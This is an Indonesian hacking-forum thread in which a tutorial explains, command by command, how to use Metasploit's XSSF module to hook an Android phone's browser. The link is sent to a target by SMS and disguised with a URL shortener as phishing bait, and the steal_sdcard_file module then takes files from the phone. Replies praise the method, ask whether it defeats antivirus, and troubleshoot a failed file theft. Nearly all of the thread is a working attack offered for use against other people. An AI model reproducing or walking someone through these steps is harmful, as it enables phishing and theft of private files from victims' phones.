[child]

mau nanya bro, kok proses steal sdcard nya lama ya, kaya ga ada respon gitu, padahal victim udah nongol di log, sama di terminal

[hamdan_zenith]

Nice tutor om keren nih om

[jrs_faisal]

trik baru ,kalo ada antivirusnya kira2 bisa tetep jebol ngga ya

[Zupray]

halo semua selamat pagi
di minggu yang cerah ini saya akan nyepam dikit. mohon jangan di masukin hati kalau ada yang kurang berkenan nanti ya :-bd
kalau misalnya sudah pernah ada yang posting saya minta maaf ya, jujur pada saat saya melakukan pencarian di forum tidak di temukan thread yang sama.

Spoiler! :

kalau begitu langsung saja kita buka kali linux, backtrack, bugtraq, atau apapun yang penting bisa di pasang msfconsole ya.

langsung download dulu xssf pada directory msfconsolenya.

svn export /svn/trunk ./ --force

Spoiler! :

setelah itu kita jalankan metasploit kita \m/

msfconsole
dan isikan
load xssf Port=80 Uri=/Xssf/ Public=true Mode=Verbose

Spoiler! :

lalu masukan

xssf_urls

maka akan muncul penampakan seperti ini

Spoiler! :

di atas itu adalah beberapa link yang merupakan ip dari attacker yang bisa di sembunyikan dengan tinyurl dll sebagai umpan pishing dan xssf home attacker dimana attacker bisa melihat log dari korban.

sekarang lihat msfconsole kita, dan copy link di sebelah [+] XSSF logs page dan paste ke web browser kesayangan anda.

Spoiler! :

maka akan muncul pemandangan seperti itu.

sekarang lihat lah bagian [+] XSSF test page dan copy link di sampingnya, lalu paste kirimkan ke android target anda lewat sms atau apapun. bisa di tutup menggunakan tinyurl atau semacamnya.
karena saya tidak punya android, maka saya pake vbox saja ya =))

Spoiler! :

pada saat korban membuka link tersebut maka koban akan menyaksikan pemandangan seperti ini

Spoiler! :

dan kita akan mendapatkan pemandangan seperti ini

Spoiler! :

new victim registered. tandanya korban sudah tersambung dengan msfconsole kita, sekarang kita buka browser milik kita yang sudah di buka link xssf tadi. maka akan muncul log dari si korban

Spoiler! :

tinggal klik saja tulisan victimnya.

sekarang coba saja kita ketik

xssf_information 1

tadaaa. nongol dah tuh infonya si korban.

Spoiler! :

sekarang android sudah resmi kena exploit, dan sekarang giliran kita untuk berkreasi mau di apakan android tersebut.
dengan:

search auxiliary/xssf

mau curi filenya?
bisa dengan memilih:

use auxiliary/xssf/public/android/steal_sdcard_file

Spoiler! :

dan run

Spoiler! :

dan secara otomatis android korban mengaksesnya dan nantinya akan muncul di log browser kita.

Spoiler! :

tapi berhubung android saya tidak ada isinya karena hanya virtual, jadi kagak muncul apa".

silahkan di kembangkan sendiri dan bila ada yang lebih asik, silahkan di postingkan ke forum.

mohon maaf kalau ada yang kurang berkenan. hanya share saja semoga bermanfaat \m/

nice share bro langsung ane coba belajar...
:-bd

[[H2]]

nice dude
it's a very great technique
+1

[sonyrimawan]

@child memang agak lama om, nanti akan muncul berupa text, lalu di save as saja lewat browser sesuai format yang di download

---

@jrs_faisal sepertinya masih tetep bisa di jebol asalkan victim mengakses url yang kita berikan sebelumnya om

---

@[H2] makasih banyak om

[child]

@sonyrimawan lamaaa bang ga ada tanda2, ini di terminal ane

[sonyrimawan]

@child coba check di web browsernya. apa sudah nongol hasil downloadnya, nanti kalau sudah tinggal di save.

[child]

@sonyrimawan web browser yang di hp maksudnya? udah, namanya K2YPac6ADuf.htm ukurannya cuma 4KB ga bisa dibuka,,,,,kalo yang di notebook blm ada yang nongol, itu status di terminalnya bener ga "Remaining Victims to attack: NONE"
apa gara2 notebook nya pake koneksi share wifi dari hp ku ya, masalah ga bang?

[sonyrimawan]

wah bagus banget nih problem butuh di benerin :o
harusnya bukan none tapi done bang. sepertinya kalau masalah wifi kagak ngaruh juga om. mungkin saat download xssf ada yang eror nggak om?